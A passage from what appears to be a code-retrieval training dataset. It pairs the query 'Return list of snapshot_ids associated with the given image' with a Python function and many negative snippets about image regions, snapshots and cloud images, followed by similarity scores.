&\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUS2IUC2_GetImageRegion(self)", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIF2ISS2_GetImageRegion(self)", "def get_images(self, page_number):", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUC2IUS2_GetImageRegion(self)", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIF2IUC2_GetImageRegion(self)", "def get(cls, name):\n return cls.images[name]", "def getimgs():", "def find_instances(self, image, region, overlap):\n self.image = np.copy(image)\n\n self.eff_step_size = int((1.0-overlap)*self.eff_box_size)\n\n y_steps = (region[3]-region[1])//self.eff_step_size\n x_steps = (region[2]-region[0])//self.eff_step_size\n\n if region[0]+(x_steps-1)*self.eff_step_size+self.eff_box_size>region[2]:\n x_steps -= 1\n if region[1]+(y_steps-1)*self.eff_step_size+self.eff_box_size>region[3]:\n y_steps -= 1\n\n if self.single_hog:\n self.resized_image = image[region[1]:region[3],region[0]:region[2],:]\n self.resized_image = cv2.resize(self.resized_image, (int(self.resized_image.shape[1]/self.scaling), int(self.resized_image.shape[0]/self.scaling)))\n features, img = self.hogger.hog_image(self.resized_image, visualize=False, feature_vector=False)\n features = np.array(features)\n self.find_instances_in_features(features, region)\n return self.image, self.resized_image\n else:\n for row in range(y_steps):\n off_y = region[1] + row * self.eff_step_size\n for col in range(x_steps):\n off_x = region[0]+col * self.eff_step_size\n sub_sample = self.get_resized_sub_sample(off_x, off_y)\n pred = self.classifier.classify(sub_sample)\n if(pred==1.0):\n cv2.rectangle(self.image, (off_x, off_y), (off_x+self.eff_box_size, off_y+self.eff_box_size), color=(255,255,255), thickness=2)\n self.boundings.append(((off_x, off_y), (off_x+self.eff_box_size, off_y+self.eff_box_size)))\n\n return self.image, None", "def nine_regions(self):\n\n coordinateList = []\n\n # Top left.\n x = (int)( self.oriImgSize[IDX_WIDTH] * self.ratioTopLeft[IDX_X] )\n y = (int)( self.oriImgSize[IDX_HEIGHT] * self.ratioTopLeft[IDX_Y] )\n coordinateList.append( [x, y] )\n\n # Top center.\n x = (int)( self.oriImgSize[IDX_WIDTH] * 0.5 - self.regionSize[IDX_WIDTH] / 2 )\n y = (int)( self.oriImgSize[IDX_HEIGHT] * self.ratioTopLeft[IDX_Y] ) \n coordinateList.append( [x, y] )\n\n # Top right.\n x = (int)( self.oriImgSize[IDX_WIDTH] * ( 1.0 - self.ratioTopLeft[IDX_X] ) - self.regionSize[IDX_WIDTH] )\n y = (int)( self.oriImgSize[IDX_HEIGHT] * self.ratioTopLeft[IDX_Y] )\n coordinateList.append( [x, y] )\n\n # Center left.\n x = (int)( self.oriImgSize[IDX_WIDTH] * self.ratioTopLeft[IDX_X] )\n y = (int)( self.oriImgSize[IDX_HEIGHT] * 0.5 - self.regionSize[IDX_HEIGHT] / 2 )\n coordinateList.append( [x, y] )\n\n # Center.\n x = (int)( self.oriImgSize[IDX_WIDTH] * 0.5 - self.regionSize[IDX_WIDTH] / 2 )\n y = (int)( self.oriImgSize[IDX_HEIGHT] * 0.5 - self.regionSize[IDX_HEIGHT] / 2 )\n coordinateList.append( [x, y] )\n\n # Center right.\n x = (int)( self.oriImgSize[IDX_WIDTH] * (1.0 - self.ratioTopLeft[IDX_X]) - self.regionSize[IDX_WIDTH] )\n y = (int)( self.oriImgSize[IDX_HEIGHT] * 0.5 - self.regionSize[IDX_HEIGHT] / 2 )\n coordinateList.append( [x, y] )\n\n # Bottom left.\n x = (int)( self.oriImgSize[IDX_WIDTH] * self.ratioTopLeft[IDX_X] )\n y = (int)( self.oriImgSize[IDX_HEIGHT] * (1.0 - self.ratioTopLeft[IDX_Y]) - self.regionSize[IDX_HEIGHT] )\n coordinateList.append( [x, y] )\n\n # Bottom center.\n x = (int)( self.oriImgSize[IDX_WIDTH] * 0.5 - self.regionSize[IDX_WIDTH] / 2 )\n y = (int)( self.oriImgSize[IDX_HEIGHT] * (1.0 - self.ratioTopLeft[IDX_Y]) - self.regionSize[IDX_HEIGHT] )\n coordinateList.append( [x, y] )\n\n # Bottom right.\n x = (int)( self.oriImgSize[IDX_WIDTH] * (1.0 - self.ratioTopLeft[IDX_X]) - self.regionSize[IDX_WIDTH] )\n y = (int)( self.oriImgSize[IDX_HEIGHT] * (1.0 - self.ratioTopLeft[IDX_Y]) - self.regionSize[IDX_HEIGHT] )\n coordinateList.append( [x, y] )\n\n return coordinateList", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterISS2ISS2_GetImageRegion(self)", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUC2IUC2_GetImageRegion(self)", "def other_object(img):\n return img[500:570, 1000:1070]", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterISS2IUC2_GetImageRegion(self)", "def iterateRegions(self, image):\n\n h, w = image.shape\n\n for i in range(h - (self.size - 1)):\n for j in range(w - (self.size - 1)):\n im_region = image[i:(i + self.size), j:(j + self.size)]\n yield im_region, i, j", "def select_region_of_interest():\r\n image = np.array(ImageGrab.grab(bbox=None))\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n r = cv2.selectROI(windowName='grab roi', img=image, showCrosshair=True, fromCenter=False)\r\n cv2.destroyAllWindows()\r\n return r[0], r[1], r[0] + r[2], r[1] + r[3]", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUC2ISS2_GetImageRegion(self)", "def get_image(name):\r\n return nova.images.find(name=name)", "def images_at(self, rects, colorkey = None):\n return [self.image_at(rect, colorkey) for rect in rects]", "def get_image(self, record_id):\n \n for img in self.img_lst:\n if img.get_recordId() == str(record_id):\n return img", "def get_image(self, imnames, idx):\r\n path = os.path.join(self.img_path, imnames[idx])\r\n return Image.open(path).convert('RGB')", "def region_of_interest(self, img):\n # get region vertices\n r1, r2, r3, r4 = self.region_filter_params[\"ratios\"]\n img_height, img_width = img.shape\n vertices = define_region_vertices(img_height, img_width, r1, r2, r3, r4)\n\n # defining a blank mask to start with\n mask = np.zeros_like(img)\n\n # defining a 3 channel or 1 channel color to fill the mask with depending on the input image\n if len(img.shape) > 2:\n channel_count = img.shape[2] # i.e. 3 or 4 depending on your image\n ignore_mask_color = (255,) * channel_count\n else:\n ignore_mask_color = 255\n\n # filling pixels inside the polygon defined by \"vertices\" with the fill color\n cv2.fillPoly(mask, [vertices], ignore_mask_color)\n\n # returning the image only where mask pixels are nonzero\n masked_image = cv2.bitwise_and(img, mask)\n return masked_image", "def get_img(self, img=None):\n\n if self.img is None: #No image specified to the ROI object\n\n # If no image is saved, check if an image was passed. If so, return the ROI of that image.\n if img is None:\n print('no image provided')\n else:\n return img[self.coords[0]:self.coords[1], self.coords[2]:self.coords[3]]\n else:\n return self.img", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUS3IUS3_GetImageRegion(self)", "def getimage(self):", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUS3ISS3_GetImageRegion(self)", "def get_region(self, region, namespace, region_id, **filters):\n filters['namespace'] = namespace\n return self.get_resource('data/wow/region/{0}', region, *[region_id], **filters)", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIF3IUS3_GetImageRegion(self)", "def image(images):\n return images[0]", "def image_for_domain(self, target_domain, _):\n img, extent, origin = _merge_tiles(self.tiles)\n return img, extent, origin", "def test_grdimage_slice(grid):\n grid_ = grid.sel(lat=slice(-30, 30))\n fig = Figure()\n fig.grdimage(grid_, cmap=\"earth\", projection=\"M6i\")\n return fig", "def getslice(self, *args, **kwargs):\n return _image.image_getslice(self, *args, **kwargs)", "def GetImageSet(cls, ID):\n if ID in cls._imageSets:\n return cls._imageSets[ID]", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIF3ISS3_GetImageRegion(self)", "def get_region(self, region):\n\n return self.adapter.get_region(region) \n\n\n\n\n #file_compression = \"\"\n # magic_dict = {\n # b\"\\x1f\\x8b\\x08\": \"gz\",\n # b\"\\x42\\x5a\\x68\": \"bz2\",\n # b\"\\x50\\x4b\\x03\\x04\": \"zip\"\n # }\n # \n\n # max_len = max(len(x) for x in magic_dict)\n # with open(file_path, \"rb\") as f:\n # file_start = f.read(max_len)\n # for magic, filetype in magic_dict.items():\n # if file_start.startswith(magic):\n # file_compression = filetype\n # split_ext = file_path.split(\".\")\n # extension = split_ext[len(split_ext) -1]\n # if(file_compression == \"zip\"):\n # if extension != \"zip\":\n # subprocess.call(\"mv {} {}.zip\".format(file_path, file_path).split())\n # subprocess.call(\"unzip {} -d .\".format(file_path).split())\n # if(file_compression == \"bz2\"):\n # if extension != \"bz2\":\n # subprocess.call(\"mv {} {}.bz2\".format(file_path,file_path).split())\n # subprocess.call(\"bzip2 -df {}\".format(file_path).split())\n # if(file_compression == \"gz\"):\n # if extension != \"gz\":\n # subprocess.call(\"mv {} {}.gz\".format(file_path,file_path).split())\n # subprocess.call(\"gzip -df {}\".format(file_path).split())", "def imagesAt(self, rects, colorKey = None):\n return [self.image_at(rect, colorKey) for rect in rects]", "def GetImage(self, which=TreeItemIcon_Normal):\r\n \r\n return self._images[which]", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterISS3IUS3_GetImageRegion(self)", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUS3IUC3_GetImageRegion(self)", "def query_image_tile(self, coord):", "def region(self):\n return GridRegionIndexer(self)", "def list_images(self):\n raise NotImplementedError()", "def list_images(self):\n \n logging.debug(\"list_images entered for %s\" % self.machine_name) \n snapshots = cs.list_snapshots()\n res = []\n server_id = self.cloudserver.id\n # find the one for this server\n for snapshot in snapshots:\n img = snapshot.metadata.get(\"instance_uuid\", None)\n # print img\n\n if img == server_id:\n print \"Server %s has snapshot %s\" % (server_id, img)\n res.append(img)\n\n return res", "def getRegion(self, format=(TILE_FORMAT_IMAGE, ), **kwargs):\n if not isinstance(format, (tuple, set, list)):\n format = (format, )\n # The tile iterator handles determining the output region\n iterInfo = self._tileIteratorInfo(**kwargs)\n # Only use gdal.Warp of the original image if the region has not been\n # styled.\n useGDALWarp = (\n iterInfo and\n not self._jsonstyle and\n TILE_FORMAT_IMAGE in format and\n kwargs.get('encoding') == 'TILED')\n if not useGDALWarp:\n return super().getRegion(format, **kwargs)\n srs = self.projection or self.getProj4String()\n tl = self.pixelToProjection(\n iterInfo['region']['left'], iterInfo['region']['top'], iterInfo['level'])\n br = self.pixelToProjection(\n iterInfo['region']['right'], iterInfo['region']['bottom'], iterInfo['level'])\n outWidth = iterInfo['output']['width']\n outHeight = iterInfo['output']['height']\n gdalParams = large_image.tilesource.base._gdalParameters(\n defaultCompression='lzw', **kwargs)\n gdalParams += ['-t_srs', srs] if srs is not None else [\n '-to', 'SRC_METHOD=NO_GEOTRANSFORM']\n gdalParams += [\n '-te', str(tl[0]), str(br[1]), str(br[0]), str(tl[1]),\n '-ts', str(int(math.floor(outWidth))), str(int(math.floor(outHeight))),\n ]\n\n fd, outputPath = tempfile.mkstemp('.tiff', 'tiledGeoRegion_')\n os.close(fd)\n try:\n self.logger.info('Using gdal warp %r', gdalParams)\n ds = gdal.Open(self._largeImagePath, gdalconst.GA_ReadOnly)\n gdal.Warp(outputPath, ds, options=gdalParams)\n except Exception as exc:\n try:\n os.unlink(outputPath)\n except Exception:\n pass\n raise exc\n return pathlib.Path(outputPath), TileOutputMimeTypes['TILED']", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterISS3ISS3_GetImageRegion(self)", "def get_region_by_name(self, name):\n raise NotImplementedError()", "def region(self):\n return self.random_element(self._regions)", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUC3IUS3_GetImageRegion(self)", "def region(self):\n return [node.region for node in self]", "def get_images():\n return _IMAGES", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIF3IUC3_GetImageRegion(self)", "def iterateRegions(self, image):\n\n h, w, _ = image.shape\n w //= 2\n h //= 2\n\n for i in range(h):\n for j in range(w):\n region = image[i * self.size:(i * self.size + self.size), j*self.size:(j*self.size + self.size)]\n yield region, i, j", "def iterateRegions(self, image):\n\n h, w, _ = image.shape\n w //= 2\n h //= 2\n\n for i in range(h):\n for j in range(w):\n region = image[i * self.size:(i * self.size + self.size), j*self.size:(j*self.size + self.size)]\n yield region, i, j", "def images(self, **kwargs):\n\n raise NotImplementedError", "def get_images(self):\n \n return self.img_lst", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUC3IUC3_GetImageRegion(self)", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterISS3IUC3_GetImageRegion(self)", "def region(self):\n if self._region is None:\n cache_key = self.expand_name(\"region\")\n cached = unitdata.kv().get(cache_key)\n if cached:\n self._region = cached\n else:\n req = self._imdv2_request(self._az_url)\n with urlopen(req) as fd:\n az = fd.read(READ_BLOCK_SIZE).decode(\"utf8\")\n self._region = az.rstrip(string.ascii_lowercase)\n unitdata.kv().set(cache_key, self._region)\n return self._region", "def get_photo(self, i):\r\n return self.__photos[i]", "def GetImageRegion(self) -> \"itkImageRegion3 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUC3ISS3_GetImageRegion(self)", "def get_region(self, region_id):\n raise exception.NotImplemented() # pragma: no cover", "def subimage(self, *args, **kwargs):\n return _image.image_subimage(self, *args, **kwargs)", "def get_image ( self, object ):\n return self.image", "def get_images(self, file_path: str) -> Iterable[Image]:\n return []", "def __getitem__(self, idx):\n image = Image.open(self.filenames[idx]) # PIL image\n image = self.transform(image)\n return image", "def get_images_by_vulnerability(self, **kwargs):\n ...", "def find_objects_in_image(self, image, visualize):\n self.select(image)\n\n for scan_region in self.scan_regions:\n self.set_scaling(scan_region[0])\n full, small = self.find_instances(image, scan_region[1], 0.5)\n if (visualize):\n fig = plt.figure(figsize=(30, 20))\n plt.imshow(small)\n plt.title(\"Scan region {} using scaling {}\".format(scan_region[1], scan_region[0]))\n plt.show()", "def get_image_base(self):\n base_id = self.familytree_json[0] if self.familytree_json else self\n if base_id == self.id:\n return self\n else:\n db = get_thread_scoped_session()\n return db.query(Image).get((base_id, self.user_id))", "def get_image(vm_):\n vm_image = config.get_cloud_config_value(\"image\", vm_, __opts__).encode(\n \"ascii\", \"salt-cloud-force-ascii\"\n )\n\n images = avail_images()\n for key in images:\n if vm_image and vm_image in (images[key][\"id\"], images[key][\"name\"]):\n return images[key]\n\n raise SaltCloudNotFound(\n \"The specified image, '{}', could not be found.\".format(vm_image)\n )", "def getImage(self, point):\n if self.map[point.y,point.x] != None:\n return self.map[point.y,point.x].getItemImage()", "def get_images(self):\n return [self.get_image(i) for i in range(0, self.number_sprites - 1)]", "def select_region(image):\n # Define the polygon by vertices\n rows, cols = image.shape[:2]\n bottom_left = [cols*0.05, rows*0.95]\n top_left = [cols*0.3, rows*0.55]\n bottom_right = [cols*0.95, rows*0.95]\n top_right = [cols*0.7, rows*0.55]\n # Vertices are an array of polygons (i.e array of arrays) and the data type must be integer.\n vertices = np.array([[bottom_left, top_left, top_right, bottom_right]], dtype=np.int32)\n return filter_region(image, vertices)", "def _iter_images(self):\n raise NotImplementedError", "def get_regions(self):\n return self._regions", "def get_images(self) -> Sequence[Optional[np.ndarray]]:\n raise NotImplementedError", "def images_mapped(self):\n try:\n return dict([x for x in enumerate(self.images())])\n except:\n return None", "def region(self, region: str) -> Region:\n return Region(self, region)", "def putregion(self, *args, **kwargs):\n return _image.image_putregion(self, *args, **kwargs)", "def get_region_of_interest(self) -> UserRoi:\n result = UserRoiStructure()\n Utils.check(VL53L1X_C_LIBRARY.VL53L1_GetUserROI(self.dev, byref(result)))\n return UserRoi.from_struct(result)", "def image_by_id(self, id):\n if not id:\n return None\n return next((image for image in self.images() if image['Id'] == id),\n None)", "def __getitem__(self, idx):\n img = self.images[idx]\n label = self.labels[idx].split(\" \")[-1]\n img = Image.open(img)\n img = img.convert('RGB')\n img = self.transform(img)\n return(img, label[:-1])", "def get_images(self):\n return self._get_brains(\"Image\")", "def region(self, region_name):\n return Region(region_name, self)", "def which_region(self, g):\n raise NotImplementedError", "def get_images(stage=0):\n return get_files(stage)[0]", "def get_image():\n return models.Image.objects.all()[0]", "def _get_im(self, idx):\n # load images\n path = self.uids[idx]\n img = self._load_im(path)\n\n # get information of each instance (e.g., tree) in a given image.\n # Each instance has its own row in the csv file,\n # so they need to be regrouped according to their path.\n groups = self.df.groupby('rgb_path')\n instances = groups.get_group(path) # contains all instances in given image\n\n num_objs = len(instances)\n boxes = [0.0] * num_objs\n labels = torch.zeros((num_objs,), dtype=torch.int64)\n #extras: cannot take string\n# uid = [''] * num_objs\n# sci_name = [''] * num_objs\n# nlcd_class = [''] * num_objs\n for i in range(num_objs):\n# import pdb; pdb.set_trace()\n boxes[i] = [instances.xmin.iloc[i], instances.ymin.iloc[i],\n instances.xmax.iloc[i], instances.ymax.iloc[i]]\n# uid[i] = self.df.uid.iloc[idx]\n# sci_name[i] = instances.scientific_name.iloc[i]\n# nlcd_class[i] = instances.nlcd_class.iloc[i]\n if self.object_rec == False:\n labels[i] = float(instances.class_id.iloc[i])\n\n if self.object_rec == True: # overwrite labels for object recognition task\n labels = torch.ones((num_objs,), dtype=torch.int64)\n\n boxes = torch.as_tensor(boxes, dtype=torch.float32)\n image_id = torch.tensor([idx])\n # for pycocotools MAP evaluation metric\n area = (boxes[:, 3] - boxes[:, 1]) * (boxes[:, 2] - boxes[:, 0])\n iscrowd = torch.zeros((num_objs,), dtype=torch.int64)\n\n target = {}\n target[\"boxes\"] = boxes\n target[\"labels\"] = labels\n target[\"image_id\"] = image_id\n target[\"area\"] = area\n target[\"iscrowd\"] = iscrowd\n #extras: cannot take string\n# target[\"site_id\"] = instances.site_id.iloc[0]\n# target[\"uid\"] = uid\n# target[\"sci_name\"] = sci_name\n# target[\"nlcd_class\"] = nlcd_class\n \n if self.transforms is not None:\n img, target = self.transforms(img, target)\n\n return img, target", "def images(self) -> dict:\n raise NotImplementedError", "def image(self, where):\n cook = cookie()\n I = Image(cook, self)\n self.call('image', cook, where)\n print(\"IMAGE\", where)\n return I" ]
[ "0.72098744", "0.719231", "0.70230323", "0.64151984", "0.63881266", "0.6098165", "0.6044503", "0.60154766", "0.6011218", "0.6006212", "0.6000203", "0.59448403", "0.5925909", "0.5922348", "0.5905722", "0.5890936", "0.5886264", "0.58704627", "0.58661884", "0.5858619", "0.5842894", "0.583351", "0.5832496", "0.5830357", "0.58169013", "0.581264", "0.58083373", "0.5805764", "0.57850456", "0.57624793", "0.5758043", "0.57552236", "0.57482123", "0.5740831", "0.57395554", "0.5724554", "0.5719464", "0.5712158", "0.570207", "0.56990904", "0.56917405", "0.5687544", "0.56794006", "0.5675569", "0.56608504", "0.56478065", "0.56440365", "0.56392294", "0.5636218", "0.56299883", "0.5626061", "0.56179243", "0.56162184", "0.5606508", "0.5589697", "0.55860364", "0.5585252", "0.5581955", "0.55746496", "0.5572329", "0.55701673", "0.55676514", "0.556762", "0.556762", "0.5560862", "0.5556951", "0.55454785", "0.5536807", "0.5531267", "0.55296427", "0.5508842", "0.55055356", "0.5500225", "0.54905134", "0.54889506", "0.5485235", "0.5482723", "0.5480729", "0.54743785", "0.54687047", "0.5460541", "0.54527503", "0.54477185", "0.54369926", "0.5426806", "0.5419665", "0.5418722", "0.541196", "0.54079366", "0.54069823", "0.5387181", "0.5385715", "0.5381326", "0.53810537", "0.5381052", "0.53786683", "0.5375281", "0.5370306", "0.5369861", "0.5365128" ]
0.6458549
3
Return list of snapshot_ids associated with the given image
def getSnapshotsOf(image): snapshotIds = [] deviceMapping = image.block_device_mapping # dict of devices devices = deviceMapping.keys() for d in devices: snapshotId = deviceMapping[d].snapshot_id if snapshotId is not None: snapshotIds.append(snapshotId.encode()) return snapshotIds
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_snapshots_of(image):\n snapshot_ids = []\n device_mapping = image.block_device_mapping # dict of devices\n devices = device_mapping.keys()\n for device in devices:\n if device_mapping[device].snapshot_id is not None:\n snapshot_ids.append(device_mapping[device].snapshot_id.encode()) # do I need to have 'encode' here?\n return snapshot_ids", "def getAmisOf(snapshot, images):\n amis = []\n for im in images:\n snapshotsOfThisIm = getSnapshotsOf(im)\n for soti in snapshotsOfThisIm:\n if soti == snapshot.id:\n amis.append(im)\n return amis", "def get_image_ids(params: DownloadCommandParameters) -> List[str]:\n if params.retry:\n logger.info(f\"Attempting to download previously failed images.\")\n with open(recovery_file_name()) as fh:\n image_ids = json.load(fh)\n else:\n df = pd.read_csv(params.metadata_file)\n image_ids = df[df[\"dataset\"] == params.dataset][\"isic_id\"]\n\n return list(image_ids)", "def list_images(self):\n \n logging.debug(\"list_images entered for %s\" % self.machine_name) \n snapshots = cs.list_snapshots()\n res = []\n server_id = self.cloudserver.id\n # find the one for this server\n for snapshot in snapshots:\n img = snapshot.metadata.get(\"instance_uuid\", None)\n # print img\n\n if img == server_id:\n print \"Server %s has snapshot %s\" % (server_id, img)\n res.append(img)\n\n return res", "def cmd_account_image_ids(client, args):\n account_image_ids = client.get_account_image_ids(args.username, args.page)\n generate_output({'account_image_ids': account_image_ids})", "def getSnapshotsD(region):\n # Can a snapshot belong to more than one AMI? Dunno, keep list just in case (so it never breaks due to it)\n snapshots = getSnapshots(region)\n snapshotsDicts = []\n ims = getImages(region)\n for s in snapshots:\n amis = getAmisOf(s, ims)\n amiIds = []\n amiKeeps = []\n\n if len(amis) == 1:\n amiIds = amis[0].id.encode()\n amiKeeps = getKeepTag(amis[0])\n\n elif len(amis) == 0:\n amiIds = \"-------no-AMI-found\"\n amiKeeps = \"-------no-AMI-found\"\n else:\n for a in amis:\n amiIds.append(a.id.encode())\n amiKeeps.append(getKeepTag(a))\n\n snapshotsDict = {\"id\": s.id,\n \"status\": s.status,\n \"region\": s.region.name,\n \"progress\": s.progress,\n \"start_time\": s.start_time,\n \"volume_id\": s.volume_id,\n \"volume_size\": s.volume_size,\n \"KEEP-tag\": getKeepTag(s),\n \"Name\": get_name_tag(s),\n \"AMI(s)\": amiIds,\n \"AMI_KEEP-tags\": amiKeeps,\n \"PROD\": isProduction(s),\n \"Description\": s.description\n }\n snapshotsDicts.append(snapshotsDict)\n return snapshotsDicts", "def get_amis_of(snapshot_id):\n mes_amis = []\n # There has GOT to be a better way. Hmm... maybe not\n keys = Ims.spreadsheet.keys()\n for key in keys:\n if snapshot_id in Ims.spreadsheet[key]['associated_snapshots']:\n mes_amis.append(key)\n return mes_amis", "def __get_image_id(self):\n return self.__get_multi_images_ids(1)", "def getContainerSnapshots(self,node,vmid):\n data = self.connect('get','nodes/%s/lxc/%s/snapshot' % (node,vmid),None)\n return data", "def __get_picture_id_list(new):\n id_list = []\n\n if new.image1:\n id_list.append(1)\n if new.image2:\n id_list.append(2)\n if new.image3:\n id_list.append(3)\n if new.image4:\n id_list.append(4)\n\n return id_list", "def get_my_image_ids(self) -> Union[List[int], None]:\n if self.imported is not True:\n logging.error(f'File {self.file_path} has not been imported')\n return None\n else:\n q = self.conn.getQueryService()\n params = Parameters()\n path_query = self.make_substitutions()\n path_query = path_query.strip('/')\n params.map = {\"cpath\": rstring(path_query)}\n results = q.projection(\n \"SELECT i.id FROM Image i\"\n \" JOIN i.fileset fs\"\n \" JOIN fs.usedFiles u\"\n \" WHERE u.clientPath=:cpath\",\n params,\n self.conn.SERVICE_OPTS\n )\n self.image_ids = [r[0].val for r in results]\n return self.image_ids", "def find_images(diag_pre_post):\n conn = sqlite3.connect(util.DB_PATH)\n conn.text_factory = str\n cursor = conn.execute('''SELECT pid from Patient where study_id = ? ''',\n (\"LGG_reseksjonsgrad\", ))\n ids = []\n k = 0\n for row in cursor:\n k += 1\n cursor2 = conn.execute('''SELECT id from Images where pid = ? and diag_pre_post = ?''',\n (row[0], diag_pre_post))\n for _id in cursor2:\n ids.append(_id[0])\n cursor2.close()\n\n cursor.close()\n conn.close()\n return ids", "def _get_ids_from_name_private(self, name):\r\n results = self.list_private_images(name=name)\r\n return [result['id'] for result in results]", "def getSnapshots(self):\n snapshots = []\n for x in self.root.goto('CommonDataObjects/Attachments'):\n for y in x.getList():\n if y['name'] == 'Video Snapshot':\n self.f.seek(y['bidx'])\n blk = Block(self.f)\n sx = blk.goto('res_x').getLong()\n sy = blk.goto('res_y').getLong()\n raw = blk.goto(\"imagedata\").value\n data = zlib.decompress(raw)\n I = np.flipud(np.array(struct.unpack(\"<\" + str(3 * sx * sy) + \"B\", data)).reshape((sy, sx, 3)))\n snapshots.append(I)\n del blk\n return snapshots", "def jail_snapshot_list(jnid = ''):\n jname = jnid\n if 'BASE-' in jnid:\n jnid = '/BASE-RW/%s@' % jnid\n else:\n jnid = '/%s@' % jnid\n \n try:\n jsnap = subprocess.check_output(\"zfs list -t snapshot |grep \"+jnid, shell=True)\n except:\n msg = \" ERROR: No zfs snapshots found for '%s'\" % (jnid)\n log(msg)\n return False\n\n jsnap = jsnap.split('\\n')\n jsnapn = []\n for i in jsnap:\n i = i.split(' ')\n while True:\n try:\n i.remove(\"\")\n except ValueError:\n break\n jsnapn.append(i)\n\n lmen = ['Number', \"'%s' current snapshots\" % jname, 'Size']\n del jsnapn[-1]\n jsn = 0\n jsnn = []\n for i in jsnapn:\n jsnn.append([jsn, i[0], i[3]])\n jsn = jsn + 1\n\n return [jsnn, lmen]", "def get_snap_list(mnode):\n\n ret, out, _ = g.run(mnode, \"gluster snapshot list --xml\")\n if ret != 0:\n g.log.error(\"Failed to execute 'snapshot list' on node %s. \"\n \"Hence failed to get the snapshot list.\", mnode)\n return None\n\n try:\n root = etree.XML(out)\n except etree.ParseError:\n g.log.error(\"Failed to parse the gluster snapshot \"\n \"list xml output.\")\n return None\n\n snap_list = []\n for snap in root.findall(\"snapList/snapshot\"):\n snap_list.append(snap.text)\n\n return snap_list", "def snapshot_identification(snapshot):\n\t\treturn {\n\t\t\t'user_id': snapshot['user_id'],\n\t\t\t'timestamp': snapshot['timestamp'],\n\t\t\t'snapshot_id': snapshot['snapshot_id']}", "def image_to_list(image):\r\n\r\n return list(image.getdata())", "def get_ids(voc_path):\n ids = []\n print(\"voc\")\n\n files_images = glob.iglob(os.path.join(voc_path, \"*.JPEG\"))\n for x in files_images:\n name = os.path.splitext(os.path.basename(x))[0]\n ids.append(name)\n print(\"names: \", ids)\n return ids", "def vm_snapshotlist(args):\n snapshot = args.snapshot\n name = args.name\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n common.pprint(\"Listing snapshots of %s...\" % name)\n snapshots = k.snapshot(snapshot, name, listing=True)\n if isinstance(snapshots, dict):\n common.pprint(\"Vm %s not found\" % name, color='red')\n return\n else:\n for snapshot in snapshots:\n print(snapshot)\n return", "def image_list(self):\n return self._image_list", "def __get_multi_images_ids(self, num_images=0): \n availability_images = imageInstance()\n images = availability_images.get_images()\n images_ids = []\n for image in images:\n if image.type == 'machine':\n images_ids.append( image.id.encode(\"latin-1\") )\n if num_images>1:\n random.shuffle(images_ids)\n return images_ids[:num_images]\n return images_ids", "def get_ids_detection(self, split):\n if split == 'test': # test set has no json file. Scrape ids from directory.\n file_names = tf.io.gfile.listdir(\n os.path.dirname(self._image_path_100k.format(split, '')))\n image_names = [f[:-4] for f in file_names if f.endswith('.jpg')]\n return set(image_names)\n\n if split not in self._data:\n self.process_json(split)\n return self._data[split].keys()", "def _get_ids_from_name_public(self, name):\r\n results = self.list_public_images(name=name)\r\n return [result['id'] for result in results]", "def get_images_since(self, image_id=None, timestamp=None,\n offset=10, limit=0):\n\n print '%s %s %s %s' % (image_id,timestamp,limit,offset)\n\n if image_id is not None:\n\n print 'got image id'\n\n # figure out what the current id is and than grab\n # our sorted set by index assuming that all ids\n # contain an image\n next_id = int(self.rc.get('images:next_id') or 0)\n\n # how far from the end is the id given\n d = next_id - image_id\n start = next_id - d\n end = next_id - d + limit - 1\n\n print 'getting between %s %s' % (start,end)\n\n # starting back where we think this image is to + limit\n ids = self.rc.zrange('images:ids:timestamps',start,end)\n\n print 'got ids: %s' % ids\n\n elif timestamp:\n\n print 'from timestamp: %s' % timestamp\n\n # get ids from our sorted set by it's weight (aka timestamp)\n # TODO: not use inf\n ids = self.rc.zrangebyscore('images:ids:timestamps',\n timestamp,'+inf')\n\n else:\n print 'could not find images'\n ids = []\n\n # page ids\n if offset < len(ids):\n ids = 